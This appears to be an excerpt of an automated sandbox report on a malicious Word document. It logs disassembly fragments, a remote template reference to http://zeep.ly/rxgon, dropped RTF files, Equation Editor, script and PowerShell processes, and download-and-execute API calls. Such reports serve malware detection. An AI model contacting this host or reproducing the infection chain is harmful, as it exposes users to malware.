                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0021258D push ebx; retf 11_2_002125EA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_002121C8 push ebx; iretd 11_2_002121EA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00212378 pushfd ; retf 11_2_00212381
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00212345 pushad ; retf 11_2_00212359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00457186 push ecx; ret 12_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0045E55D push esi; ret 12_2_0045E566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00457AA8 push eax; ret 12_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00434EB6 push ecx; ret 12_2_00434EC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_10002806 push ecx; ret 12_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00451D34 push eax; ret 14_2_00451D41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4

                    Persistence and Installation Behavior

                    barindex
                    Microsoft Office launches external ms-search protocol handler (WebDAV)
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\zeep.ly\DavWWWRootJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\zeep.ly\DavWWWRootJump to behavior
                    Contains an external reference to another file
                    Source: settings.xml.relsExtracted files from sample: http://zeep.ly/rxgon
                    Office drops RTF file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc.0.drJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: B0E0C498.doc.0.drJump to dropped file
                    Office viewer loads remote template
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00406EEB ShellExecuteW,URLDownloadToFileW,12_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CBE1
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
